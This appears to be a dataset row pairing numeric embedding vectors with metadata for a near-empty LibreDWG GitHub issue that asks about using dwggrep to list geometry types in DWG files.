-0.012303398922085762, 0.00147141027264297, 0.0003145959635730833, -0.011591512709856033, 0.0073992968536913395, -0.018681606277823448, -0.027483103796839714, 0.019501354545354843, 0.014388720504939556, -0.0068707759492099285, -0.005644750315696001, 0.0028349589556455612, 0.00717278802767396, -0.01876789703965187, -0.0406709648668766, 0.008715206757187843, -0.001632303581573069, 0.010836482979357243, -0.002939225174486637, -0.022104410454630852, -0.017142783850431442, -0.019242485985159874, -0.007104475516825914, 0.015431380830705166, 0.018782278522849083, -0.02620314620435238, -0.015028698369860649, 0.01961640641093254, -0.0023369984701275826, -0.014352766796946526, -0.007359747774899006, 0.006680220365524292, -0.01817825436592102, -0.008801496587693691, -0.004778263159096241, 0.015431380830705166, 0.017761189490556717, -0.00937675777822733, -0.003965706564486027, 0.01150522381067276, 0.0005631267558783293, -0.00583530543372035, 0.03175441920757294, -0.006975041702389717, 0.004300077445805073, 0.004084354266524315, 0.011476460844278336, 0.001467814901843667, -0.03589629754424095, 0.013525828719139099, 0.0029266413766890764, 0.019328774884343147, -0.02104017697274685, -0.02476499415934086, 0.023240551352500916, -0.0019882465712726116, 0.021299045532941818, 0.00003067310535698198, -0.014439055696129799, -0.04095859453082085, 0.017617374658584595, 0.00042605280759744346, -0.013655262067914009, -0.008902166970074177, -0.007435251027345657, -0.013439539819955826, -0.01016774121671915, -0.005008367821574211, -0.021974977105855942, -0.0036547062918543816, 0.006809654179960489, -0.0019397088326513767, -0.015186895616352558, -0.0045193955302238464, -0.009916064329445362, 0.0034803301095962524, -0.0032448326237499714, 0.009621242992579937, -0.0005509923794306815, -0.006435734685510397, -0.0031369710341095924, 0.004835789557546377, -0.027425577864050865, 0.0245780348777771, -0.023614471778273582, -0.030229974538087845, 0.0294102281332016, 0.0024682299699634314, -0.0008233425905928016, -0.02856171689927578, -0.019558880478143692, -0.010354701429605484, 0.009894492104649544, -0.00934799388051033, 0.010289984755218029, -0.004404343664646149, -0.003936943598091602, 0.027109183371067047, -0.02647639624774456, -0.0006278436630964279, 0.003097421955317259, 0.002450253115966916, 0.0045229909010231495, -0.023183025419712067, 0.0071548111736774445, -0.0032664048485457897, -0.017602993175387383, -0.0038506544660776854, 0.008334096521139145, 0.004134689923375845, 0.018710369244217873, 0.029654713347554207, 0.0047423094511032104, -0.007259076926857233, -0.002612045267596841, -0.023024829104542732, -0.012015768326818943, 0.0021913854870945215, -0.008312524296343327, 0.00950619112700224, 0.02201812155544758, -0.012885850854218006, -0.000019760558643611148, -0.006086982320994139, -0.0025149700231850147, 0.005562056787312031, 0.034544434398412704, 0.006051028613001108, -0.00684560788795352, -0.012519121170043945, 0.01123916544020176, -0.00882306881248951, 0.022650908678770065, -0.014029182493686676, -0.013914129696786404, -0.007014591246843338, 0.0001869598781922832, -0.009398330003023148, -0.020019089803099632, 0.007952986285090446, 0.0045733265578746796, 0.008851831778883934, 0.0025167677085846663, -0.0324159674346447, 0.01150522381067276, 0.0008844640688039362, -0.005112633574754, -0.008585773408412933, -0.04170643538236618, 0.010289984755218029, -0.00498320022597909, 0.03615516424179077, -0.005137801636010408, 0.012116438709199429, 0.01718592830002308, -0.007895459420979023, 0.00039212137926369905, -0.028389139100909233, 0.009995163418352604, 0.014216141775250435, 0.012396878562867641, 0.0074424417689442635, 0.01255507580935955, -0.00037369504570961, 0.019098671153187752, -0.017344124615192413, 0.008729588240385056, -0.006565168499946594, 0.017746808007359505, -0.02137095294892788, 0.0013033261056989431, 0.016970204189419746, -0.01941506564617157, -0.011929478496313095, -0.010225267149508, -0.018149489536881447, -0.0019271249184384942, -0.01771804504096508, 0.0005882944678887725, -0.028849348425865173, 0.0337103046476841, 0.010009544901549816, 0.03273236006498337, 0.00383267761208117, -0.00820466224104166, -0.0041706436313688755, -0.0001899934868561104, -0.002998549025505781, -0.024678705260157585, -0.000717278802767396, -0.008348478004336357, 0.005173755344003439, 0.0167976263910532, 0.010419418103992939, 0.005813733208924532, -0.014230523258447647, 0.0007469406700693071, -0.008571391925215721, 0.019443828612565994, -0.0008390723960474133, 0.013863794505596161, 0.011059395968914032, 0.027555011212825775, 0.010764574632048607, 0.011303882114589214, -0.00879430491477251, 0.0038542498368769884, 0.004001660738140345, 0.012698890641331673, -0.00011443428229540586, 0.012979330494999886, -0.010103024542331696, 0.004842980299144983, -0.011512414552271366, 0.023125499486923218, 0.008945311419665813, -0.021816780790686607, 0.007694118190556765, -0.024736231192946434, 0.0035216771066188812, -0.0075143491849303246, 0.02288101427257061, -0.007280649151653051, 0.02196059562265873, 0.014532535336911678, 0.014525344595313072, -0.0053894780576229095, 0.0075071584433317184, 0.019990326836705208, -0.0056771086528897285, 0.00218958780169487, 0.002398120006546378, -0.0070505449548363686, 0.002054760931059718, 0.01415142510086298, -0.02209002897143364, -0.014956790953874588, 0.009570907801389694, -0.008477911353111267, 0.023974010720849037, -0.007521539926528931, -0.004425915889441967, 0.0028223751578480005, -0.005659131798893213, 0.03071894682943821, 0.005062298383563757, 0.008672062307596207, 0.005853282753378153, 0.008254998363554478, 0.0013563580578193069, -0.012015768326818943, 0.008183090016245842, -0.030690183863043785, -0.02798645757138729, -0.005691490136086941, -0.016452470794320107, -0.001867801183834672, 0.007708499673753977, -0.002505981596186757, 0.006403375882655382, -0.017013348639011383, -0.013209435157477856, 0.0015190490521490574, -0.0021015009842813015, 0.017502320930361748, -0.020019089803099632, -0.02144286036491394, -0.001957685686647892, -0.007758835330605507, 0.006856394466012716, 0.0051485877484083176, 0.009685960598289967, -0.028518572449684143, -0.00934799388051033, 0.014827356673777103, 0.02052244357764721, -0.015244421549141407, 0.006338659208267927, 0.02214755490422249, -0.0018947665812447667, -0.014036373235285282, -0.008715206757187843, -0.022852251306176186, 0.015546433627605438, -0.004663210827857256, -0.0030542772728949785, -0.011800045147538185, 0.0057166581973433495, 0.03235844150185585, 0.01659628562629223, -0.003679873887449503, -0.006924706511199474, -0.012468785978853703, -0.0024969931691884995, -0.02653392218053341, -0.01245440449565649, 0.017991293221712112, 0.006705387961119413, 0.0017311766277998686, -0.013655262067914009, 0.024204114452004433, 0.006903134286403656, 0.031869471073150635, -0.021083323284983635, 0.006604717578738928, -0.0068671805784106255, 0.0040555913001298904, 0.002671369118615985, 0.014093899168074131, 0.00032066318090073764, -0.009801012463867664, -0.009369566105306149, -0.0008359263883903623, 0.014489390887320042, 0.01343234907835722, -0.016366180032491684, -0.006327873095870018, 0.02999987080693245, -0.021198375150561333, 0.0076222107745707035, 0.025541596114635468, 0.023024829104542732, 0.009916064329445362, 0.010649522766470909, -0.00042492925422266126, 0.014841738156974316, -0.004141880664974451, 0.002088917186483741, 0.02019166760146618, -0.010512897744774818, -0.002248911652714014, -0.006432139314711094, 0.008312524296343327, 0.018926093354821205, -0.005450599826872349, -0.026433251798152924, 0.004213788080960512, -0.01136859878897667, -0.0037895331624895334, -0.011519605293869972, 0.02372952364385128, 0.02321178838610649, 0.000661100959405303, 0.010584806092083454, -0.04685502499341965, 0.009470237419009209, -0.01062795054167509, -0.002106894040480256, -0.0018273531459271908, -0.00392256211489439, 0.006371017545461655, -0.002879901323467493, 0.0023226169869303703, 0.0010480539640411735, -0.018451502546668053, -0.0173297431319952, 0.007456823252141476, -0.008966883644461632, -0.010261221788823605, 0.0006790778716094792, 0.01159870345145464, -0.01428805012255907, -0.00694268336519599, 0.0017869051080197096, 0.013950083404779434, -0.001599046285264194, -0.010340319946408272, -0.005562056787312031, 0.008808687329292297, 0.01843712106347084, 0.006788081955164671, -0.010728620924055576, -0.04576202854514122, -0.01751670241355896, 0.02196059562265873, 0.019041145220398903, 0.004213788080960512, 0.0029122596606612206, 0.011203211732208729, -0.026950987055897713, -0.01182880811393261, -0.002682155231013894, 0.009398330003023148, -0.001964876428246498, 0.0076222107745707035, -0.0076869274489581585, 0.0083988131955266, 0.008470720611512661, -0.010405036620795727, -0.027727589011192322, 0.008679253049194813, -0.002196778543293476, 0.0006907628267072141, -0.010254031047224998, -0.0038506544660776854, 0.006662243511527777, 0.015503289178013802, 0.0005613290704786777, -0.007183574140071869, 0.02836037613451481, -0.008068038150668144, -0.01226025354117155, 0.018465884029865265, 0.0006193045992404222, 0.011023442260921001, -0.011800045147538185, -0.023039210587739944, 0.015028698369860649, 0.0042389556765556335, -0.01627989113330841, -0.005360715091228485, 0.024462981149554253, 0.025857990607619286, 0.03509093075990677, 0.014590062201023102, 0.018020056188106537, 0.026433251798152924, 0.002928439062088728, 0.020119760185480118, 0.0011199616128578782, 0.014050754718482494, 0.004012446850538254, 0.013942892663180828, -0.007251886185258627, 0.005907213315367699, -0.022895395755767822, 0.00830533355474472, 0.01297213975340128, -0.009944827295839787, -0.01146927010267973, -0.020148523151874542, 0.017674900591373444, 0.017214691266417503, 0.006018670275807381, 0.01674010045826435, 0.018120726570487022, -0.01059199683368206, -0.027741970494389534, -0.012576648034155369, 0.00040852531674318016, -0.019832128658890724, -0.028806203976273537, 0.004073568154126406, 0.0010956927435472608, -0.003714029910042882, -0.007600638549774885, 0.01973145827651024, 0.0019415065180510283, -0.00024134005070663989, 0.006277537904679775, -0.0140579454600811, -0.023585708811879158, 0.017703663557767868, 0.006478879135102034, 0.007967367768287659, 0.021586675196886063, -0.00010819853923749179, -0.009585289284586906, 0.007151215802878141, 0.02196059562265873, -0.022075647488236427, 0.015301947481930256, 0.005935976281762123, -0.003295168047770858, 0.011835998855531216, 0.00766535522416234, -0.004034019075334072, 0.007816361263394356, -0.015474526211619377, -0.0015226444229483604, 0.00437917560338974, -0.0014210748486220837, 0.009556526318192482, -0.01402199175208807, -0.002816982101649046, -0.004670401569455862, -0.003724816255271435, 0.0173297431319952, 0.010548852384090424, -0.008139945566654205, 0.013180672191083431, 0.02673526294529438, 0.02079569175839424, 0.00950619112700224, -0.012821133248507977, -0.00875835120677948, -0.010570424608886242, -0.006378208287060261, -0.008542628958821297, -0.009836966171860695, -0.02627505548298359, -0.006892348174005747, 0.024074681103229523, 0.011879143305122852, -0.008139945566654205, 0.004670401569455862, -0.01961640641093254, 0.002644403837621212, 0.019055526703596115, 0.019530117511749268, 0.005173755344003439, -0.01087962742894888, -0.007830742746591568, -0.006691006477922201, 0.0026587853208184242, 0.022377660498023033, 0.01659628562629223, -0.019530117511749268, 0.004785453900694847, -0.005008367821574211, -0.008240616880357265, -0.0048070261254906654, 0.000009908368156175129, -0.005709467455744743, 0.02267967164516449, 0.010807719081640244, 0.0046344478614628315, -0.001146927010267973, 0.010786146856844425, 0.024995097890496254, -0.008161517791450024, -0.02234889753162861, -0.006148104090243578, -0.008262189105153084, -0.002745074452832341, -0.003534260904416442, -0.009398330003023148, -0.00018707223352976143, 0.0020116164814680815, 0.01600664295256138, -0.0001757243153406307, 0.020551206544041634, -0.0068707759492099285, 0.006993018556386232, 0.006374612916260958, -0.007280649151653051, 0.005109038203954697, -0.0035019025672227144, 0.0005429027369245887, -0.0018911710940301418, 0.010146168991923332, -0.02595866098999977, -0.0008098598918877542, -0.014352766796946526, 0.016696956008672714, -0.008312524296343327, 0.007988939993083477, 0.017933767288923264, 0.00285293604247272, -0.01525880303233862, -0.0078019797801971436, -0.0041706436313688755, 0.02321178838610649, -0.021730491891503334, 0.0009806405287235975, -0.018854185938835144, -0.012900232337415218, -0.015603959560394287, -0.03287617489695549, -0.007593447808176279, -0.007528730668127537, 0.015431380830705166, 0.006148104090243578, 0.020421771332621574, -0.00171140197198838, -0.0086648715659976, -0.008736778981983662, 0.02948213554918766, 0.016092931851744652, 0.001325797289609909, 0.0063638268038630486, 0.02104017697274685, 0.002790016820654273, 0.012080485001206398, 0.017114020884037018, 0.007708499673753977, -0.005637559574097395, 0.007780407555401325, 0.007169192656874657, 0.017042113468050957, 0.004652424715459347, 0.003645717864856124, 0.008441957645118237, 0.0029877626802772284, 0.01032593846321106, 0.01411547139286995, 0.015977879986166954, -0.017473557963967323, 0.0126126017421484, 0.011124113574624062, 0.007014591246843338, 0.013813459314405918, -0.006435734685510397, 0.004882529377937317, 0.0031693296041339636, 0.012116438709199429, -0.03215710073709488, 0.011569940485060215, 0.005917999427765608, -0.0004516699118539691, -0.01291461382061243, 0.007607829291373491, -0.0019271249184384942, 0.018120726570487022, -0.035062167793512344, 0.0036403245758265257, -0.008657680824398994, 0.018120726570487022, -0.00303270504809916, 0.0006682917010039091, 0.016121694818139076, -0.026505159214138985, -0.0011595108080655336, 0.022406423464417458, 0.0010858054738491774, 0.025872372090816498, -0.009110699407756329, 0.002958999713882804, -0.015230040065944195, -0.014999935403466225, 0.0008152529480867088, 0.0023963223211467266, 0.00506589375436306, -0.026835935190320015, -0.003507295623421669, 0.0007289637578651309, -0.00823342613875866, 0.0006336861406452954, 0.005080275237560272, 0.004228169564157724, -0.04156262055039406, 0.01336763147264719, 0.02223384566605091, -0.0035090933088213205, 0.006327873095870018, 0.0035558331292122602, -0.0011873750481754541, -0.006726960651576519, -0.012195536866784096, -0.0010174931958317757, 0.010498516261577606, -0.013497065752744675, -0.00993763655424118, 0.0019558880012482405, 0.004008851479738951, -0.02175925485789776, 0.008068038150668144, -0.008197471499443054, 0.013000902719795704, -0.0016161244129762053, -0.004224574193358421, -0.0016943239606916904, -0.0036672900896519423, 0.008830259554088116, 0.01825016178190708, -0.007960177026689053, 0.04262685403227806, 0.008700825273990631, 0.021788017824292183, 0.012138010933995247, 0.00823342613875866, 0.014302431605756283, -0.0029086642898619175, -0.010534470900893211, -0.00666583888232708, -0.00397289777174592, -0.011052205227315426, -0.021716110408306122, 0.0174447949975729, 0.025527214631438255, 0.006507642101496458, -0.010858055204153061, 0.013051237910985947, -0.0020781310740858316, 0.013094382360577583, -0.011555559001863003, -0.00026987839373759925, 0.010369082912802696, -0.00937675777822733, 0.03071894682943821, -0.006712579168379307, 0.001751850126311183, -0.028274087235331535, -0.0018731942400336266, 0.019630787894129753, 0.008377240970730782, -0.020292337983846664, 0.002069142647087574, 0.019817747175693512, -0.017171546816825867, 0.008966883644461632, 0.007018186617642641, 0.019170578569173813, 0.011857571080327034, -0.015963498502969742, -0.002162622520700097, 0.001162207336165011, 0.006802463438361883, 0.017157165333628654, 0.01563272252678871, -0.004896910861134529, 0.010548852384090424, -0.011332645080983639, -0.00671617453917861, -0.014942409470677376, -0.011821617372334003, 0.0041670482605695724, -0.029971107840538025, -0.017559846863150597, 0.009499000385403633, -0.007550302892923355, -0.016567522659897804, 0.008334096521139145, 0.001680841320194304, 0.016236746683716774, -0.005554866045713425, -0.0038758222945034504, 0.008729588240385056, 0.0029374274890869856, -0.0010076059261336923, -0.016768863424658775, -0.012950567528605461, 0.00166645972058177, 0.022967303171753883, 0.04858080670237541, -0.006126531399786472, 0.015416999347507954, -0.004594898782670498, -0.021658584475517273, -0.005091061349958181, -0.004738714080303907, -0.0013311903458088636, 0.005224090535193682, 0.01075738389045, 0.001977460226044059, 0.01000235415995121, -0.0013581557432189584, -0.024405455216765404, -0.00478904927149415, -0.0025976637843996286, 0.012267445214092731, -0.0008399712387472391, -0.008254998363554478, -0.017617374658584595, 0.014266476966440678, -0.004328840412199497, 0.0022579000797122717, -0.0095780985429883, 0.006608312949538231, 0.004882529377937317, 0.011656229384243488, -0.02019166760146618, 0.009074744768440723, -0.003926157485693693, 0.0013986037811264396, 0.002887092065066099, 0.002088917186483741, -0.009549335576593876, 0.010512897744774818, 0.01520127709954977, 0.007737263105809689, 0.0233412217348814, -0.018063200637698174, 0.001677245949395001, 0.0064393300563097, -0.005810137838125229, -0.024218495935201645, 0.021155230700969696, -0.009031600318849087, 0.02321178838610649, -0.016323035582900047, 0.007471204735338688, 0.02620314620435238, 0.01392132043838501, 0.01052727922797203, 0.01731536164879799, -0.017502320930361748, 0.007823552004992962, -0.00456254044547677, 0.002241720911115408, 0.00800332147628069, -0.005698681343346834, -0.016294272616505623, 0.0020745357032865286, -0.007093689404428005, -0.013166290707886219, -0.008679253049194813, -0.009017218835651875, -0.028159035369753838, 0.014065136201679707, -0.005260044243186712, 0.013892557471990585, -0.00022774501121602952, 0.017013348639011383, -0.01705649495124817, -0.012238681316375732, 0.02203250303864479, -0.018350832164287567, 0.01994718238711357, -0.032588545233011246, 0.0010282794246450067, -0.015848444774746895, 0.0010741205187514424, -0.007215932477265596, -0.01428805012255907, 0.006428543943911791, -0.0023621662985533476, -0.013245388865470886, 0.007960177026689053, -0.0073525570333004, -0.0033778618089854717, -0.008751160465180874, -0.0034210062585771084, 0.013389203697443008, 0.008578582666814327, 0.015071842819452286, 0.007744453847408295, -0.030891526490449905, 0.00967876985669136, 0.0030093351379036903, 0.014093899168074131, 0.01766051910817623, -0.0014255691785365343, -0.014129852876067162, 0.025901135057210922, -0.006151699461042881, -0.01039784587919712, -0.0021644202060997486, -0.0024628369137644768, -0.010570424608886242, -0.0035720125306397676, -0.014367148280143738, -0.020838836207985878, -0.01882542297244072, 0.015345091931521893, 0.010534470900893211, -0.012871469371020794, -0.0009010927169583738, 0.014640397392213345, -0.013899748213589191, 0.009858538396656513, -0.012849897146224976, 0.01016774121671915, 0.01036189217120409, 0.0026839529164135456, -0.006202034652233124, 0.021169612184166908, -0.02437669225037098, -0.013302914798259735, 0.011526796035468578, 0.003440781030803919, 0.010369082912802696, 0.024491744115948677, 0.011318263597786427, 0.004382770974189043, 0.006773700471967459, -0.017948148772120476, 0.011533986777067184, 0.018782278522849083, 0.005910808686167002, 0.004929269198328257, 0.020479297265410423, 0.01533071044832468, 0.001912743435241282, 0.008930929936468601, 0.026447633281350136, 0.006748532876372337, 0.00023594696540385485, -0.0025149700231850147, 0.011627466417849064, 0.004030423704534769, -0.003295168047770858, -0.0017940958496183157, -0.018451502546668053, 0.025671029463410378, 0.00296619045548141, 0.007960177026689053, -0.0012754618655890226, -0.007090094033628702, 0.02321178838610649, -0.00849229283630848, 0.012051722034811974, -0.018796660006046295, 0.020450534299016, 0.014122662134468555, 0.000706043210811913, -0.0024250855203717947, -0.015848444774746895, -0.002477218396961689, -0.0006759318639524281, -0.0027091207448393106, -0.009477428160607815, 0.02699413150548935, -0.0007873887661844492, -0.008010512217879295, -0.01935753971338272, -0.007715690415352583, -0.012296208180487156, 0.0032070809975266457, 0.015992261469364166, 0.013094382360577583, 0.009628433734178543, 0.0179769117385149, 0.008564201183617115, 0.005659131798893213, 0.008190280757844448, -0.014856119640171528, 0.0023963223211467266, 0.0056087966077029705, 0.014827356673777103, -0.010052689351141453, -0.0027217045426368713, 0.00625596521422267, 0.0057813748717308044, -0.0018947665812447667, -0.023743905127048492, 0.013835031539201736, -0.00885902252048254, -0.015345091931521893, 0.03394040837883949, 0.005472172051668167, -0.010642332024872303, 0.002985964994877577, -0.01934315823018551, 0.02026357501745224, -0.011785663664340973, 0.013338868506252766, -0.005468576680868864 ]
2,254
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
Hello!
Using dwggrep to find all distinct geometry types (or subclasses) in dwg
https://api.github.com/repos/LibreDWG/libredwg/issues/336/comments
0
2021-04-21T06:26:55
2021-04-21T06:31:48Z
https://github.com/LibreDWG/libredwg/issues/336
863,493,907
336
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Using dwggrep to find all distinct geometry types (or subclasses) in dwg Issue date: --- start body --- Hello! --- end body ---
189
[ 0.0072865597903728485, 0.03396320343017578, -0.014781614765524864, -0.002935113850980997, 0.0600467175245285, 0.023567184805870056, 0.03209393471479416, 0.04345334693789482, -0.022862615063786507, 0.03396320343017578, -0.0009544063359498978, -0.002147863619029522, 0.03010963276028633, -0.00123030343092978, -0.030483486130833626, 0.033848173916339874, 0.014350244775414467, 0.0005468514282256365, 0.0031130542047321796, -0.04152655974030495, 0.0064346035942435265, -0.001380384317599237, -0.0007526509580202401, 0.013825410977005959, -0.003569587366655469, -0.0031418120488524437, 0.019052179530262947, -0.0068695684894919395, -0.04862978681921959, 0.0012833259534090757, 0.026040373370051384, 0.022589413449168205, 0.03370438143610954, 0.007807798683643341, 0.0275789275765419, 0.00498591922223568, 0.00988556444644928, 0.04492000490427017, -0.027722718194127083, 0.035084765404462814, 0.019167210906744003, -0.030310938134789467, 0.013415609486401081, 0.03215144947171211, 0.003655861597508192, 0.009065961465239525, 0.013178355991840363, -0.009022824466228485, 0.0011008924338966608, -0.004784613382071257, -0.019569823518395424, -0.005765980109572411, -0.030167147517204285, -0.004709123633801937, -0.007351265288889408, -0.07281526923179626, 0.04287818819284439, 0.01166137121617794, 0.008764002472162247, 0.003691809019073844, 0.02996584214270115, 0.014529982581734657, -0.028585458174347878, 0.018635187298059464, 0.006610746495425701, 0.01150320190936327, -0.005640164017677307, 0.02642860822379589, 0.0019339758437126875, -0.002413875190541148, 0.012782933190464973, -0.00607512891292572, -0.007074469234794378, 0.02425737865269184, 0.015040436759591103, -0.019181590527296066, -0.011172485537827015, -0.03140374273061752, -0.004177100490778685, 0.00767119787633419, 0.007987536489963531, 0.015256121754646301, -0.008037862367928028, -0.0016697617247700691, -0.008174463175237179, -0.0034599476493895054, 0.004640823230147362, -0.05935652554035187, -0.014601877890527248, -0.011301896534860134, -0.013616915792226791, 0.029591988772153854, 0.05107421800494194, -0.004468275234103203, 0.010072491131722927, -0.013243061490356922, -0.010324124246835709, -0.014026717282831669, -0.022718824446201324, 0.026054752990603447, -0.014220833778381348, 0.0021137134172022343, 0.0029800483025610447, 0.030138390138745308, 0.01551494374871254, 0.006589177995920181, 0.012941102497279644, 0.01734107732772827, -0.0011071831686422229, 0.08104006201028824, 0.03790305182337761, -0.013573778793215752, -0.010597324930131435, -0.0008470131433568895, 0.005996044259518385, 0.04969383403658867, -0.0052087935619056225, -0.07396559417247772, -0.009303214959800243, -0.003276615170761943, -0.031978901475667953, -0.03830566257238388, 0.001080222544260323, -0.04978010803461075, -0.061024487018585205, 0.02611226961016655, -0.028829900547862053, 0.027995917946100235, -0.014580308459699154, 0.028398530557751656, -0.02770833857357502, -0.026486122980713844, 0.014379003085196018, 0.007628060877323151, 0.041066430509090424, 0.005467616021633148, 0.00785093568265438, 0.05834999307990074, -0.007707145530730486, -0.0011224609334021807, -0.03827690705657005, -0.07270023971796036, 0.00588460685685277, -0.004565333481878042, -0.03879455104470253, 0.018879631534218788, -0.013271819800138474, 0.0026313576381653547, 0.019052179530262947, -0.0025990046560764313, -0.002773350104689598, 0.000913965399377048, 0.02434365265071392, -0.008059430867433548, 0.005719248205423355, 0.0015807916643097997, -0.033848173916339874, 0.001366904005408287, -0.00007020997145446017, -0.006786889396607876, 0.013595347292721272, -0.03448084741830826, 0.012351563200354576, -0.006653883494436741, -0.03241027146577835, 0.032611578702926636, 0.02881552092730999, 0.026486122980713844, -0.0017416566843166947, 0.0023527643643319607, 0.0020651842933148146, 0.0021137134172022343, 0.02740637958049774, 0.049463771283626556, -0.03427954390645027, -0.011201242916285992, -0.023078300058841705, 0.008361389860510826, -0.012509732507169247, -0.013818222098052502, -0.014954162761569023, -0.02000119350850582, 0.014839131385087967, 0.008296684361994267, 0.019569823518395424, 0.033273011445999146, 0.0431082509458065, 0.0018315254710614681, 0.006704210303723812, 0.016593368723988533, -0.010374450124800205, 0.015572460368275642, 0.025033844634890556, -0.008972497656941414, 0.003849978093057871, -0.02309267781674862, -0.045293860137462616, -0.04345334693789482, 0.0037852725945413113, -0.01578814536333084, 0.020820796489715576, 0.003526450367644429, 0.04641542211174965, 0.0018000714480876923, 0.041699107736349106, -0.011122158728539944, -0.008986876346170902, 0.02956322953104973, 0.013624105602502823, -0.030742308124899864, -0.025278287008404732, -0.02770833857357502, -0.008929360657930374, 0.005384936463087797, -0.028082191944122314, 0.01893714629113674, 0.018563292920589447, -0.002775147557258606, -0.003210112452507019, -0.007254207041114569, 0.03238151594996452, -0.036465153098106384, 0.021712293848395348, 0.005812712013721466, -0.019785508513450623, 0.007185906637459993, 0.029405061155557632, 0.009943080134689808, -0.05395001918077469, 0.022603793069720268, 0.04037623852491379, 0.004090826492756605, 0.003282007295638323, -0.02885865792632103, -0.03005211614072323, -0.02885865792632103, -0.007063684985041618, -0.005449641961604357, -0.014249592088162899, -0.01951230689883232, 0.0065963673405349255, 0.048917368054389954, -0.004367622081190348, -0.03249654546380043, 0.030799824744462967, 0.036378879100084305, 0.014350244775414467, -0.02176981046795845, 0.005582647863775492, 0.049233704805374146, 0.005855849012732506, -0.002160445088520646, 0.06257741898298264, -0.028873037546873093, 0.0034797186963260174, -0.014465277083218098, 0.043252039700746536, 0.020202498883008957, -0.02327960543334484, -0.03036845475435257, 0.005259120371192694, 0.016636505722999573, -0.038018085062503815, 0.0019519496709108353, -0.016823433339595795, -0.037040311843156815, 0.009044392965734005, -0.03603377938270569, -0.018333228304982185, 0.016650885343551636, -0.01849139854311943, -0.03045472875237465, -0.04241805896162987, 0.0016589774750173092, -0.043338313698768616, -0.017355456948280334, 0.038018085062503815, -0.003842788515612483, 0.046041566878557205, -0.021697916090488434, -0.07293030619621277, 0.013509073294699192, -0.00959798414260149, 0.0025325019378215075, -0.0036073322407901287, -0.02589658461511135, -0.019080936908721924, 0.023739734664559364, -0.03991611301898956, -0.052598390728235245, -0.028873037546873093, 0.008390148170292377, -0.014379003085196018, 0.008275115862488747, -0.013602537102997303, -0.0058270907029509544, 0.028341013938188553, -0.05311603844165802, -0.012358753010630608, -0.03258281946182251, -0.00777904037386179, -0.013660052791237831, 0.0007360252202488482, -0.012214963324368, 0.006452577654272318, -0.0033395234495401382, 0.006571204401552677, 0.03913964703679085, -0.032122693955898285, -0.025235150009393692, 0.016593368723988533, -0.015931935980916023, -0.010165954940021038, -0.004662391729652882, -0.0026996578089892864, -0.012286857701838017, 0.039254676550626755, -0.01936851628124714, 0.025997236371040344, -0.004949971567839384, -0.036781489849090576, -0.02549397200345993, -0.053173553198575974, -0.00995026994496584, 0.030914856120944023, 0.0012968062656000257, -0.04561019688844681, 0.01150320190936327, 0.0039542256854474545, 0.019871782511472702, 0.005704869516193867, 0.01808878593146801, -0.006675451993942261, -0.01787310093641281, 0.023078300058841705, -0.06815647333860397, -0.015888798981904984, -0.027593307197093964, 0.000044344618800096214, -0.029333166778087616, -0.00031678739469498396, 0.04739319533109665, -0.006294408347457647, -0.024099208414554596, 0.010410398244857788, -0.027823369950056076, 0.00784374587237835, 0.0011251569958403707, 0.0061614029109478, 0.028714869171380997, 0.0008222992182709277, 0.02034628950059414, 0.0011781795183196664, 0.007308128289878368, -0.002022047294303775, 0.00946857314556837, 0.008907792158424854, -0.04920494928956032, 0.04696182161569595, -0.0018090582452714443, 0.005068598315119743, -0.041382770985364914, 0.014853510074317455, 0.017628656700253487, -0.0195985808968544, 0.020446941256523132, 0.0034060264006257057, -0.004935592878609896, -0.03166256472468376, 0.00022590761363971978, 0.007721524685621262, 0.04609908163547516, -0.0021083212923258543, 0.007750282529741526, -0.03683900460600853, 0.005679706111550331, 0.028614215552806854, 0.023969797417521477, -0.010374450124800205, 0.013156787492334843, -0.062174808233976364, 0.012603196315467358, 0.033273011445999146, -0.03600502386689186, 0.022143663838505745, 0.018462639302015305, 0.005442452616989613, 0.004468275234103203, -0.02836977317929268, -0.01534239575266838, -0.0391971617937088, 0.013660052791237831, -0.024659989401698112, -0.030167147517204285, 0.03396320343017578, 0.03192138671875, -0.006758131552487612, 0.009583605453372002, 0.01883649453520775, -0.0008088189060799778, -0.010963989421725273, -0.0010352882090955973, 0.0038823308423161507, 0.031231194734573364, -0.010554187931120396, -0.038995854556560516, -0.002020249841734767, -0.007556166034191847, 0.018275713548064232, 0.021654779091477394, -0.017010360956192017, 0.012416268698871136, -0.01870708353817463, 0.04132525250315666, 0.010417587123811245, -0.004446706734597683, -0.02230183407664299, 0.058004897087812424, -0.04241805896162987, -0.017226045951247215, -0.0045221964828670025, -0.03750044107437134, -0.030799824744462967, -0.014213643968105316, -0.01955544389784336, -0.027722718194127083, 0.04655921086668968, 0.027018146589398384, 0.033589351922273636, -0.061024487018585205, -0.028384150937199593, 0.026586776599287987, 0.022445622831583023, 0.016435200348496437, 0.00012828766193706542, -0.005233956966549158, -0.018778977915644646, -0.03617757186293602, 0.012337184511125088, 0.00012121049803681672, 0.002796716056764126, 0.038679517805576324, -0.008713675662875175, -0.006114671006798744, -0.012380321510136127, -0.014134559780359268, -0.0812126100063324, -0.028312256559729576, 0.050556574016809464, 0.011143727228045464, 0.02225869707763195, 0.024861296638846397, -0.03652266785502434, -0.01350188348442316, 0.01176921371370554, -0.013947633095085621, 0.008756812661886215, 0.01551494374871254, 0.05101670324802399, -0.0006299800588749349, -0.005226767621934414, 0.014781614765524864, -0.02119464986026287, -0.007592113688588142, 0.037615470588207245, 0.03600502386689186, 0.024127967655658722, -0.030828582122921944, 0.004471869673579931, 0.023035163059830666, -0.005248336121439934, -0.004281348083168268, 0.005683301016688347, -0.01356658898293972, -0.019296621903777122, 0.02087831310927868, -0.023107057437300682, -0.022848235443234444, -0.003361091949045658, -0.013077703304588795, -0.002473188564181328, -0.03407823666930199, -0.039484743028879166, 0.0035839665215462446, -0.020202498883008957, 0.014925405383110046, 0.06953685730695724, 0.007441134192049503, -0.03324425593018532, 0.037845537066459656, 0.0019429627573117614, 0.0045221964828670025, -0.02832663618028164, -0.022776341065764427, 0.03381941467523575, 0.03341680392622948, -0.027679581195116043, -0.025652140378952026, 0.04054878652095795, 0.003379065776243806, 0.007520218379795551, -0.020849553868174553, 0.008871844969689846, -0.019210347905755043, 0.04601280763745308, -0.006164997350424528, -0.022373728454113007, 0.029246892780065536, 0.008828707970678806, -0.047939594835042953, 0.012588816694915295, -0.04253309220075607, -0.014637825079262257, -0.04445987567305565, 0.014580308459699154, -0.024530578404664993, 0.004468275234103203, 0.004572522826492786, 0.01759989932179451, 0.004824155475944281, -0.02034628950059414, -0.0391971617937088, -0.024861296638846397, 0.027161937206983566, 